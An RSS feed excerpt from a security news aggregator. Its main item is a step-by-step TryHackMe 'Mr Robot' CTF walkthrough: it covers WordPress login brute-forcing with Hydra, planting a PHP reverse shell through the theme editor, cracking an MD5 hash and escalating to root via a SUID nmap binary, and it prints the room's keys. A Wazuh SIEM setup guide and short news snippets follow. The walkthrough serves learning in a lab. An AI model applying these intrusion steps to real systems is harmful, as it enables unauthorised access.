src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr Robot CTF Walkthrough -TryHackMe Detailed]]></title>
<description><![CDATA[Writeup by CobrakaiI recently solved the Mr Robot CTF room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse she...]]></description>
<link>https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:10 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/437/1*VBbNWudhR1HvtyMylXnNMg.png"><figcaption>Writeup by Cobrakai</figcaption></figure><p>I recently solved the <strong>Mr Robot CTF</strong> room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse shells, hash cracking, Linux privilege escalation, and SUID abuse.</p><p>This writeup follows the complete path I used to move from initial access to root. I have also added explanations for every important step, because the real value of this box is not only getting the flags, but understanding why each step matters.</p><h3>Lab Setup</h3><p>First, I started the TryHackMe machine and connected my Kali Linux machine to the TryHackMe VPN.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>To connect Kali with TryHackMe, download your OpenVPN configuration file from:</p><p><strong>TryHackMe → Access → VPN Settings → Download Configuration File</strong></p><p>If the VPN file is on Windows and your Kali machine is running inside VMware, you can transfer it using scp:</p><pre>scp &lt;FULL-WINDOWS-FILE-PATH&gt; &lt;KALI-USERNAME&gt;@&lt;KALI-IP&gt;:&lt;DESTINATION-PATH&gt;</pre><p>Example:</p><pre>scp C:\Users\user\Downloads\cyberpat.ovpn kali@192.168.1.10:/home/kali/</pre><p>After that, start the VPN connection from Kali:</p><pre>sudo openvpn &lt;FILENAME&gt;.ovpn</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>Once the VPN was connected, I started the target machine and received the target IP address.</p><h3>Opening the Web Application</h3><p>I opened the target IP in the browser:</p><pre>http://&lt;TARGET-IP&gt;</pre><p>The homepage showed a terminal-style Mr Robot themed interface. There were many commands visible on the page, but they were mostly visual distractions. In this room, the actual path comes from proper enumeration.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/677/1*O2PdkxBJXwnZjCDYXotcSA.png"><figcaption>Front Web Page of the App Part 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*Ix5Nxx8pZ5hHLFbMUzurXw.png"><figcaption>Front Web Page of the App Part 2</figcaption></figure><h3>Checking robots.txt</h3><p>Before running heavy enumeration, I checked the simplest and most common file first:</p><pre>http://&lt;TARGET-IP&gt;/robots.txt</pre><p>robots.txt is a plain text file placed at the root of a website. It tells search engine crawlers which paths they are allowed or not allowed to crawl.</p><p>In CTFs, this file is often used to hide interesting paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*m5Pf6nr3_XxwMUFa2FnlnA.png"><figcaption>Checking Robots.txt</figcaption></figure><p>Inside robots.txt, I found two interesting entries:</p><pre>key-1-of-3.txt<br>fsocity.dic</pre><p>I opened the first file and got the first key:</p><pre>073403c8a58a1f80d943455fb30724b9</pre><p>So the first key was recovered successfully.</p><h3>Nmap Enumeration</h3><p>While checking the web application manually, I also ran an Nmap scan in parallel.</p><pre>sudo nmap -sC -sV -O -A &lt;TARGET-IP&gt;</pre><p>The goal of this scan was to identify open ports, running services, versions, and possible operating system details.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*XcmS17aaKWaV9wFazMeDyg.png"><figcaption>Nmap Scan 1</figcaption></figure><p>The scan showed these important services:</p><pre>22/tcp   open   ssh<br>80/tcp   open   http<br>443/tcp  open   https</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*l7aZo93PY5Mr5f5VFWTasg.png"><figcaption>Nmap Scan 2</figcaption></figure><p>Some useful observations from the scan:</p><ul><li>SSH was exposed remotely.</li><li>HTTP was available on port 80.</li><li>HTTPS was available on port 443.</li><li>The web server disclosed Apache/Ubuntu details.</li><li>The SSL certificate appeared expired.</li></ul><p>These are not direct exploitation points by themselves, but they help build a picture of the target.</p><h3>Downloading fsocity.dic</h3><p>The second interesting file from robots.txt was:</p><pre>fsocity.dic</pre><p>I opened it in the browser and saw that it contained a large wordlist.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/712/1*xuaZvg6pU910v2d3qUx2Sg.png"><figcaption>Downloading the Wordlists</figcaption></figure><p>This wordlist becomes useful later for the alternative Hydra-based username and password discovery method.</p><h3>Directory Enumeration with Gobuster</h3><p>Next, I used Gobuster to enumerate hidden directories and files on the web server.</p><pre>sudo gobuster dir -u http://&lt;TARGET-IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 -k</pre><p>Command breakdown:</p><pre>dir</pre><p>Runs Gobuster in directory brute-forcing mode.</p><pre>-u http://&lt;TARGET-IP&gt;</pre><p>Specifies the target URL.</p><pre>-w</pre><p>Specifies the wordlist.</p><pre>-t 50</pre><p>Uses 50 threads to speed up the scan.</p><pre>-k</pre><p>Skips TLS certificate verification. This is mostly useful for HTTPS targets, but it does not hurt if reused in the command.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*JcomDvLAAlnEV-kNXLMicQ.png"><figcaption>Gobuster Scan Running</figcaption></figure><p>Gobuster returned several interesting paths, including WordPress-related directories.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*-pjY06PZDTX7PAsmZjJO0Q.png"><figcaption>Gobuster Scan Results</figcaption></figure><p>Important findings included:</p><pre>/wp-admin<br>/wp-content<br>/wp-includes<br>/wp-login.php<br>/license<br>/readme</pre><p>The /wp-login.php path confirmed that the target was running WordPress.</p><h3>WordPress Login Page</h3><p>I opened the login page:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*qJBRxhlW97Bu-NP4amSxNw.png"><figcaption>Wp-Login Page</figcaption></figure><p>At this point, I needed valid WordPress credentials. The next useful path was /license.</p><h3>Inspecting /license</h3><p>I opened:</p><pre>http://&lt;TARGET-IP&gt;/license</pre><p>The page showed a suspicious message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/691/1*S5LU74vlvb2K7yOFFyJ6cQ.png"><figcaption>Navigated to the /license Directory</figcaption></figure><p>Whenever a page looks suspicious in a CTF, checking the source code is a good habit. I viewed the page source and found a Base64-looking string hidden inside.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/722/1*JrOrvao3rNySKHEHm8R15A.png"><figcaption>Text at Bottom</figcaption></figure><p>I decoded the Base64 string and recovered credentials for the WordPress user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*D8BKNTBXYnwHqxmfbQFJpA.png"><figcaption>Decoding the Text</figcaption></figure><p>The credentials were:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>Using these credentials, I logged in to the WordPress admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*s0BvDREHoEJmof1w9hSgeg.png"><figcaption>Wp-Login Successfull</figcaption></figure><h3>Getting a Reverse Shell through WordPress Theme Editor</h3><p>After logging into WordPress, I started exploring the admin panel.</p><p>The important section was:</p><pre>Appearance → Theme Editor</pre><p>The Theme Editor allowed editing PHP files directly from the WordPress dashboard. This is dangerous because PHP code executed by the web server can be abused to get a reverse shell.</p><p>A reverse shell is a shell where the target machine connects back to the attacker machine.</p><p>In simple terms:</p><ol><li>I start a listener on my machine.</li><li>I place a reverse shell payload on the target.</li><li>The target connects back to my listener.</li><li>I get command execution on the target.</li></ol><p>I used a PHP reverse shell payload generated from:</p><pre>https://www.revshells.com/</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*3UchA43HXsnFpG82qb8u-Q.png"><figcaption>https://revershells.com/</figcaption></figure><p>Important point:</p><p>The IP address inside the reverse shell payload must be the attacker machine IP, not the target IP.</p><p>To find the attacker VPN IP, use:</p><pre>ip a</pre><p>Usually, the TryHackMe VPN interface is tun0.</p><p>Then I edited a PHP theme file from the WordPress Theme Editor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*zzeZXtnC53Xqp13Lj1kWwg.png"><figcaption>Replacing with the PHP Reverse Shell Code</figcaption></figure><p>I pasted the PHP reverse shell payload into a theme file such as:</p><pre>archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*37-Uh02yebTRGbS8NOc0AA.png"><figcaption>Pasted the Code</figcaption></figure><p>Before triggering the payload, I started a Netcat listener on my Kali machine:</p><pre>nc -lvnp 4444</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*vFOHGgyyrEDDoq71Uo7VdA.png"><figcaption>Netcat Listener Started</figcaption></figure><p>Then I accessed the modified PHP file from the browser:</p><pre>http://&lt;TARGET-IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*DWV67QlA1XOYgG9seCe7mg.png"><figcaption>Accessing that Edited PHP File</figcaption></figure><p>Once the page was opened, the target connected back to my listener.</p><h3>Initial Shell Access</h3><p>The reverse shell connected successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*OQyRkLeDQWLzedGiL85_dw.png"><figcaption>Voila, Got the Reverse Shell</figcaption></figure><p>I checked the current user:</p><pre>whoami</pre><p>The shell was running as the web server user, not as root.</p><p>Then I started enumerating the filesystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*BScsAYqgAMEJ8iOC7bEsOg.png"><figcaption>Got the Key 2 As Well</figcaption></figure><p>Inside /home/robot, I found:</p><pre>key-2-of-3.txt<br>password.raw-md5</pre><p>The second key file was not directly readable because of permissions. However, the password hash file was readable.</p><p>The hash looked like this:</p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><p>This was an MD5 hash for the robot user.</p><h3>Cracking the Robot User Hash</h3><p>I cracked the MD5 hash and got the password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*Cq5fXr8MtrmOoBUp7gV1rw.png"><figcaption>Cracking the Robot Password</figcaption></figure><p>Before switching users, I stabilized the shell.</p><p>A basic reverse shell often behaves badly:</p><ul><li>Arrow keys may not work.</li><li>Ctrl + C may kill the shell.</li><li>su, clear, nano, and similar commands may not work properly.</li><li>There is no proper TTY.</li></ul><p>To spawn a better shell, I used:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*m-8NWLldbgqSgzJysMESVA.png"><figcaption>Switching to the Robot User</figcaption></figure><p>Then I switched to the robot user:</p><pre>su robot</pre><p>Password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><p>After switching users, I read the second key:</p><pre>cat /home/robot/key-2-of-3.txt</pre><p>The second key was:</p><pre>822c73956184f694993bede3eb39f959</pre><p>I confirmed the current user:</p><pre>whoami<br>id<br>hostname</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*ajN7CbP56HWgIitDX0Vm9w.png"></figure><h3>Privilege Escalation Enumeration</h3><p>At this point, I had access as the robot user, but the final key was inside /root, so privilege escalation was required.</p><p>One common Linux privilege escalation technique is checking for SUID binaries.</p><p>SUID stands for <strong>Set User ID</strong>.</p><p>If a binary has the SUID bit enabled, it runs with the permissions of the file owner instead of the user who executes it.</p><p>If a SUID binary is owned by root, it may be possible to abuse it for root-level execution.</p><p>I searched for SUID binaries using:</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Command breakdown:</p><pre>find /</pre><p>Search from the root of the filesystem.</p><pre>-perm -u=s</pre><p>Find files where the SUID bit is set for the owner.</p><pre>-type f</pre><p>Only return regular files.</p><pre>2&gt;/dev/null</pre><p>Hide permission-denied errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*xATgnc0v_thCZNmhW5jSuw.png"><figcaption>Finding the SUID Permissions</figcaption></figure><p>The interesting result was:</p><pre>/usr/local/bin/nmap</pre><p>This stood out because nmap should normally not be SUID.</p><p>Also, the location was suspicious:</p><pre>/usr/local/bin/nmap</pre><p>The /usr/local/bin directory usually contains manually installed binaries, not default system binaries.</p><p>Older versions of Nmap had an interactive mode that could execute shell commands. If that old Nmap binary has the SUID bit and is owned by root, it can be abused to spawn a root shell.</p><p>I checked it using:</p><pre>ls -la /usr/local/bin/nmap<br>/usr/local/bin/nmap --version</pre><p>Then I started interactive mode:</p><pre>/usr/local/bin/nmap --interactive</pre><p>Inside the Nmap interactive prompt, I used:</p><pre>!sh</pre><p>That spawned a shell.</p><p>I confirmed root access:</p><pre>whoami</pre><p>Output:</p><pre>root</pre><p>Then I read the final key:</p><pre>cat /root/key-3-of-3.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*qXCV_UlQNk6RdxPtqOKmzg.png"><figcaption>Voila, Got 3rd Key As Well.</figcaption></figure><p>The third key was:</p><pre>04787ddef27c3dee1ee161b21670b4e4</pre><p>At this point, all three keys were recovered.</p><h3>Alternative Method: Finding Elliot Credentials with Hydra</h3><p>The /license method gives the WordPress password quickly, but there is another method using the fsocity.dic wordlist.</p><p>This method is useful because it teaches how to use Hydra against a WordPress login form.</p><h3>Cleaning the Wordlist</h3><p>First, I checked the size of the original wordlist:</p><pre>wc -w fsocity.dic</pre><p>The file was very large and had many duplicate entries.</p><p>To clean it, I sorted the file and removed duplicates:</p><pre>sort fsocity.dic | uniq &gt; fs-list</pre><p>Then I checked the size again:</p><pre>wc -w fs-list</pre><p>Command breakdown:</p><pre>wc -w fsocity.dic</pre><p>Counts the number of words in fsocity.dic.</p><pre>sort fsocity.dic</pre><p>Sorts the wordlist alphabetically.</p><pre>uniq</pre><p>Removes adjacent duplicate lines.</p><pre>&gt; fs-list</pre><p>Saves the cleaned output into a new file named fs-list.</p><p>This smaller cleaned wordlist makes Hydra faster.</p><h3>Finding the Valid WordPress Username</h3><p>Using Burp Suite, I inspected the WordPress login request.</p><p>The important POST parameters were:</p><pre>log<br>pwd</pre><p>WordPress used this error message when the username was invalid:</p><pre>Invalid username</pre><p>So I used Hydra to test every word from fs-list as a possible username while keeping the password fixed as test.</p><pre>hydra -L fs-list -p test &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><p>Command breakdown:</p><pre>-L fs-list</pre><p>Use usernames from the file fs-list.</p><pre>-p test</pre><p>Use one static password: test.</p><pre>http-post-form</pre><p>Tell Hydra that the target login uses an HTTP POST form.</p><pre>/wp-login.php</pre><p>WordPress login endpoint.</p><pre>log=^USER^&amp;pwd=^PASS^</pre><p>Hydra replaces ^USER^ with each username from the file and ^PASS^ with the static password.</p><pre>F=Invalid username</pre><p>Failure condition. If the response contains Invalid username, Hydra treats the attempt as failed.</p><pre>-t 30</pre><p>Run 30 parallel tasks.</p><p>Hydra found the valid username:</p><pre>elliot</pre><p>Important note: Hydra may show test beside the username in this step. That does not mean test is the correct password. It only means the username is valid.</p><h3>Finding Elliot’s Password</h3><p>After finding the username, I kept the username fixed and brute-forced the password using the same cleaned wordlist.</p><p>WordPress shows a different error when the username is valid but the password is wrong:</p><pre>The password you entered for the username</pre><p>So I used that as the failure condition:</p><pre>hydra -l elliot -P fs-list &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p>Command breakdown:</p><pre>-l elliot</pre><p>Use one static username.</p><pre>-P fs-list</pre><p>Use passwords from the file fs-list.</p><pre>F=The password you entered for the username</pre><p>If this message appears, Hydra knows the password is wrong.</p><p>Hydra found the valid credentials:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>These credentials can be used to log in here:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><h3>What I Learned</h3><p>This room is a good example of why basic enumeration matters.</p><p>The important lessons were:</p><ul><li>Always check robots.txt.</li><li>Do not ignore source code comments or hidden strings.</li><li>Directory brute-forcing can reveal critical application paths.</li><li>WordPress admin access can lead to code execution if theme editing is available.</li><li>Reverse shells require the attacker IP, not the target IP.</li><li>Always stabilize your shell before using commands like su.</li><li>Readable password hashes can lead to user switching.</li><li>SUID binaries are a major Linux privilege escalation vector.</li><li>Unusual SUID binaries in /usr/local/bin deserve attention.</li><li>Old versions of common tools can become privilege escalation paths.</li></ul><p>The box starts with simple web enumeration and ends with Linux privilege escalation through an old SUID Nmap binary. That makes it a solid practice machine for connecting web exploitation with post-exploitation basics.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=678d7908d472" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mr-robot-ctf-walkthrough-tryhackme-detailed-678d7908d472">Mr Robot CTF Walkthrough -TryHackMe Detailed</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh SIEM Deployment with Multi-OS Agents]]></title>
<description><![CDATA[Project OverviewThis project demonstrates the deployment of Wazuh, an open-source, industry-recognized SIEM and host-based intrusion detection platform, in a virtualized lab environment. Wazuh was selected for this project due to its wide adoption in security operations, strong community support,...]]></description>
<link>https://tsecurity.de/de/3646307/hacking/wazuh-siem-deployment-with-multi-os-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646307/hacking/wazuh-siem-deployment-with-multi-os-agents/</guid>
<pubDate>Sun, 05 Jul 2026 08:22:33 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Project Overview</h3><p>This project demonstrates the deployment of Wazuh, an open-source,<strong> </strong>industry-recognized SIEM and host-based intrusion detection platform, in a virtualized lab environment. Wazuh was selected for this project due to its wide adoption in security operations, strong community support, and alignment with real-world SOC practices.</p><p>A Wazuh Manager was installed on an Ubuntu system and configured to centrally monitor three endpoints: Windows, Kali Linux, and Ubuntu. Each endpoint was successfully enrolled as a Wazuh agent and configured to forward system logs and security events to the manager for analysis.</p><p>The project validates end-to-end log collection and visibility through the Wazuh web dashboard, demonstrating how security events from multiple operating systems can be centrally analyzed. This setup reflects a realistic enterprise monitoring scenario and highlights the effectiveness of Wazuh as a cost-effective, open-source security monitoring solution used across modern SOC environments.</p><h3>Tools Used</h3><ul><li><strong>Wazuh SIEM (Open Source):</strong> Centralized security monitoring, log collection, and host-based intrusion detection platform</li><li><strong>Ubuntu Server: </strong>Hosting the Wazuh Manager, Indexer, and Web Dashboard</li><li><strong>Windows</strong> : Endpoint monitored using the Wazuh agent (Agent 1)</li><li><strong>Kali Linux: </strong>Linux endpoint monitored using the Wazuh agent (Agent 2)</li><li><strong>Ubuntu: </strong>Linux endpoint monitored using the Wazuh agent (Agent 3)</li><li><strong>VMware Workstation: </strong>Virtualization platform used to host all systems</li><li><strong>Web Browser (Windows): </strong>Used to access the Wazuh web dashboard over HTTPS</li></ul><h3><strong>Wazuh Deployment</strong></h3><p>Wazuh was deployed on Ubuntu Server using the official all-in-one installation script, following the Wazuh deployment guide. <a href="https://documentation.wazuh.com/current/quickstart.html">Read here</a></p><pre>curl -sO https://packages.wazuh.com/4.14/wazuh-install.sh &amp;&amp; sudo bash ./wazuh-install.sh -a</pre><p>This command installs all required dependencies along with the Wazuh Manager, Indexer, and Dashboard. Upon completion of the installation, a username and password are automatically generated for accessing the Wazuh web interface.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0AEIg9diazhMdLr1tFCj2Q.jpeg"></figure><h3><strong>Firewall Configuration</strong></h3><p>The firewall on the Wazuh server was configured to allow all Wazuh components to communicate properly, including agents, the dashboard, indexer, and Syslog. The following UFW rules were applied:</p><pre># Essential Wazuh ports<br>sudo ufw allow 1514/tcp   # Agent → Manager communication<br>sudo ufw allow 1515/tcp   # Agent enrollment<br>sudo ufw allow 443/tcp    # Wazuh Web Dashboard (HTTPS)<br><br># Optional ports for future use<br>sudo ufw allow 55000/tcp  # Wazuh API<br>sudo ufw allow 514/tcp    # Syslog collector<br>sudo ufw allow 22/tcp     # SSH access to server<br><br>sudo ufw enable - Enables the UFW firewall<br>sudo ufw status numbered - Displays the current firewall status and lists all active rules with numbering</pre><p><strong>Accessing the Wazuh Web Interface</strong></p><p>After the firewall was configured to allow all essential ports, the Wazuh web dashboard was accessed via a web browser. This interface provides centralized visibility into all connected agents, system events, and security alerts.</p><pre>https://192.168.79.145:443</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IgesWE_x72ThLyu7T2u6Zg.jpeg"></figure><p>Log in using the username and password generated during installation.</p><h3><strong>Agents Enrollment</strong></h3><p>To enroll an agent, navigate to Endpoints, Deploy new agents.</p><p><strong>Agent 1: Windows</strong></p><p>Step 1: Select windows architecture</p><p>Step 2: Enter the Wazuh Manager IP Address</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6XDcpPc3wF4_3kHmaFA46g.jpeg"></figure><p>Step 3: Set agent name (optional)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8Pt49xAxtkU_j3ZPIQJANw.jpeg"></figure><p>Step 4: Copy and Run the Installation Command in Powershell. Run<strong> </strong>Powershell with administrator privileges</p><pre>Invoke-WebRequest -Uri https://packages.wazuh.com/4.x/windows/wazuh-agent-4.14.2-1.msi -OutFile $env:tmp\wazuh-agent; msiexec.exe /i $env:tmp\wazuh-agent /q WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Windows'</pre><p>Step 5: Still in Powershell, run this command to start Wazuh agent</p><pre>NET START Wazuh</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0Pip8lFhljVYCDMXbfWSTA.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/856/1*PKtqPkx1byKQ7hbNWB3qSg.jpeg"></figure><p><strong>Agent 2: Kali Linux</strong></p><p>On the Deploy new agent;</p><p><strong>Step 1: Select the Operating System</strong></p><ul><li>Choose <strong>Linux</strong> as the target OS.</li><li>For Kali Linux, choose DEB amd64.</li></ul><p><strong>Step 2: Assign Server Address</strong></p><ul><li>Enter your Wazuh manager’s IP address:</li></ul><p><strong>Step 3: Set Agent Name (Optional)</strong></p><ul><li>Enter a unique agent name (Kali)</li></ul><p><strong>Step 4: Copy and run the installation command</strong></p><ul><li>The UI generates a command tailored to your inputs. Run it in your Kali terminal:</li></ul><pre>wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.2-1_amd64.deb &amp;&amp; sudo WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Kali' dpkg -i ./wazuh-agent_4.14.2–1_amd64.deb</pre><p><strong>Step 5: Start and Enable the Agent</strong></p><p>Run the following commands to activate the agent:</p><pre>sudo systemctl daemon-reload<br>sudo systemctl enable wazuh-agent<br>sudo systemctl start wazuh-agent</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/931/1*yXEvvJC8fb3hn9POaHkGdA.jpeg"></figure><p><strong>Agent 3: Ubuntu</strong></p><p>Repeat the same steps as Agent 2</p><p><strong>Copy and run the installation command</strong></p><ul><li>The UI generates a command tailored to your inputs. Run it in your Ubuntu terminal:</li></ul><pre>wget https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.14.2-1_amd64.deb &amp;&amp; sudo WAZUH_MANAGER='192.168.79.145' WAZUH_AGENT_GROUP='default' WAZUH_AGENT_NAME='Ubuntu' dpkg -i ./wazuh-agent_4.14.2-1_amd64.deb</pre><p><strong>Start and Enable the Agent</strong></p><p>Run the following commands to activate the agent:</p><pre>sudo systemctl daemon-reload<br>sudo systemctl enable wazuh-agent<br>sudo systemctl start wazuh-agent</pre><p><strong>Dashboard of all Enrolled Agents</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*NVedJg8zql98glxWBS5wZg.jpeg"></figure><h3>Conclusion</h3><p>Through the deployment and configuration of Wazuh, I successfully set up a centralized security monitoring environment with multiple agents across Windows, Kali Linux, and Ubuntu. Wazuh provides real-time visibility into system events, log collection, and threat detection, making it a robust and open-source industry-standard SIEM solution. Beyond log monitoring, Wazuh can be leveraged for File Integrity Monitoring (FIM) to track changes in critical files and directories, detect unauthorized modifications, and alert security teams.</p><p>Additionally, it integrates seamlessly with other security tools and services, such as Syslog for centralized logging, SSH for remote administration, and custom APIs for automated workflows, enabling comprehensive and proactive security operations.</p><p>This setup serves as a foundation for future projects, where I plan to expand Wazuh’s capabilities with additional agents, advanced detection rules, integrations with threat intelligence feeds, and custom security automation workflows to simulate real-world SOC scenarios.</p><p>Many thanks to <a href="https://medium.com/u/f6fc6f913781">Efam Harris</a> 🫡</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=09e80e1821e9" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/wazuh-siem-deployment-with-multi-os-agents-09e80e1821e9">Wazuh SIEM Deployment with Multi-OS Agents</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What ensures data security once sensitive data is scattered everywhere?]]></title>
<description><![CDATA[Forgive me if this question has an obvious answer. What becomes the control plane for enterprise data security once an organization's data is spread across S3, Snowflake, SaaS apps, exports, etc? Is it IAM, classification, data lineage, DLP, DSPM or a combination of all the above? And how are tea...]]></description>
<link>https://tsecurity.de/de/3646088/it-security-nachrichten/what-ensures-data-security-once-sensitive-data-is-scattered-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646088/it-security-nachrichten/what-ensures-data-security-once-sensitive-data-is-scattered-everywhere/</guid>
<pubDate>Sun, 05 Jul 2026 04:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Forgive me if this question has an obvious answer. What becomes the control plane for enterprise data security once an organization's data is spread across S3, Snowflake, SaaS apps, exports, etc?</p> <p>Is it IAM, classification, data lineage, DLP, DSPM or a combination of all the above? And how are teams making this work when quarterly access reviews are too slow for how fast data moves?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Beneficial_Winter927"> /u/Beneficial_Winter927 </a> <br> <span><a href="https://www.reddit.com/r/security/comments/1un4hvc/what_ensures_data_security_once_sensitive_data_is/">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1un4hvc/what_ensures_data_security_once_sensitive_data_is/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[China GaN-Konkurrent: Infineon setzt Verbot von Innoscience in Deutschland durch]]></title>
<description><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages ...]]></description>
<link>https://tsecurity.de/de/3645528/it-security-nachrichten/china-gan-konkurrent-infineon-setzt-verbot-von-innoscience-in-deutschland-durch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645528/it-security-nachrichten/china-gan-konkurrent-infineon-setzt-verbot-von-innoscience-in-deutschland-durch/</guid>
<pubDate>Sat, 04 Jul 2026 17:07:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) · zum Kurs. <b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Studie untersucht Zusammenhang zwischen KI-Investitionen und Personalwachstum - Golem.de]]></title>
<description><![CDATA[E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... Information Security Professional: virtueller Fünf-Tage-Workshop ...]]></description>
<link>https://tsecurity.de/de/3645191/it-security-nachrichten/studie-untersucht-zusammenhang-zwischen-ki-investitionen-und-personalwachstum-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645191/it-security-nachrichten/studie-untersucht-zusammenhang-zwischen-ki-investitionen-und-personalwachstum-golemde/</guid>
<pubDate>Sat, 04 Jul 2026 12:24:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[E-Learning: <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning) ... Information <b>Security</b> Professional: virtueller Fünf-Tage-Workshop ...]]></content:encoded>
</item>
<item>
